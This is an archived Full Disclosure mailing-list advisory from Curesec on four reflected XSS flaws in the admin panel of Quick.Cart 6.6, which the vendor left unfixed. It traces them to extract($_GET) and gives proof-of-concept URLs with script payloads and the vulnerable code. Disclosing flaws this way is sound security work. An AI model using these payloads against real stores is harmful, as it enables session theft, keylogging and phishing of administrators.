[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Quick.Cart 6.6: Multiple XSS
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] Quick.Cart 6.6: Multiple XSS
- From: "Curesec Research Team (CRT)" <crt@xxxxxxxxxxx>
- Date: Tue, 03 Nov 2015 11:59:24 +0100
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Quick.Cart 6.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: info@xxxxxxxxxxxxxxxx
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Description
Quick.Cart 6.6 is vulnerable to multiple reflected XSS attacks. With this, it
is possible to inject JavaScript keylogger or perform phishing attacks.
The vulnerabilities are all in the admin.php file. To add security through
obscurity, Quick.Cart does suggest to rename this file, which would make it
more difficult to exploit these vulnerabilities. The renaming is not mandatory.
The vulnerabilities detailed below depend on the fact that the main entry
points for users and admins contains a call to extract:
index.php
extract( $_GET );
admin.php
extract( $_GET );
With this, it is possible to overwrite or set any variable. Because of this, it
is not considered best-practice to pass user input to extract.
The SESSION variable can not be set by an attacker, because session_start is
called after extract, but variables such as SERVER or COOKIE and undefined
variables can be set.
This call also makes it possible to send POST requests via GET, making the
exploitation of for example CSRF easier. It may have further negative effects
as well.
3. Details
XSS 1
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iStatus=";><script>alert(1)</script>
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iProducts=";><script>alert('xss')</script>
Code:
templates/admin/orders.php
<form action="?p=<?php echo $p; ?><?php if( isset( $sPhrase ) ) echo
'&sPhrase='.$sPhrase; ?><?php if( isset( $iStatus ) ) echo
'&iStatus='.$iStatus; ?><?php if( isset( $iProducts ) ) echo
'&iProducts='.$iProducts; ?>" method="post">
XSS 2
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=lang-translations&sLanguage=<script>alert(1)</script>
Code:
templates/admin/languages.php
<h1><?php echo $lang['Languages'].( isset( $sLanguage ) ? ' '.$sLanguage :
null ); ?><a href="<?php echo $config['manual_link']; ?>instruction#1.6"
title="<?php echo $lang['Manual']; ?>" target="_blank"></a></h1>
XSS 3
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_COOKIE[sLogin]=";
autofocus onfocus="alert('xss')
Code:
common-admin.php
$content = '<script type="text/javascript">
AddOnload( cursor );
</script><form method="post" action="'.$sLoginPage.'"
name="form"><fieldset><input type="hidden" name="sLoginPageNext"
value="'.$_SERVER['REQUEST_URI'].'" /><div
id="login"><label>'.$lang['Login'].':</label><input type="text" name="sLogin"
class="input" value="'.( isset( $_COOKIE['sLogin'] ) ? strip_tags(
$_COOKIE['sLogin'] ) : null ).'" /></pre><div
id="pass"><label>'.$lang['Password'].':</label><input type="password"
name="sPass" class="input" value="" /></pre><div id="submit"><input
type="submit" value="'.$lang['log_in'].' >>" /></pre></fieldset></form>';
XSS 4
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_SERVER[HTTP_HOST]=";></iframe><script>alert(1)</script>&_SERVER[SCRIPT_FILENAME]=/var/www/ecommerce/Quick.Cart_v6.6/admin.php
Please note that the SCRIPT_FILENAME must be set correctly, as it's used as the
name of the session key and overwriting one SERVER value leads to the deletion
of all other SERVER values.
Code:
core/libraries/trash.php
$GLOBALS['lang']['Language'] .= '<iframe
src="http://opensolution.org/news,.html?sUrl='.$_SERVER['HTTP_HOST'].'"
style="display:none;"></iframe>';
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
09/07/2015 Informed Vendor about Issue
10/01/2015 Reminded Vendor of release date
10/01/2015 Vendor does not plan on releasing a fix, because the optional rename
of the admin file may mitigate this issue already
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/QuickCart-66-Multiple-XSS-74.html
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/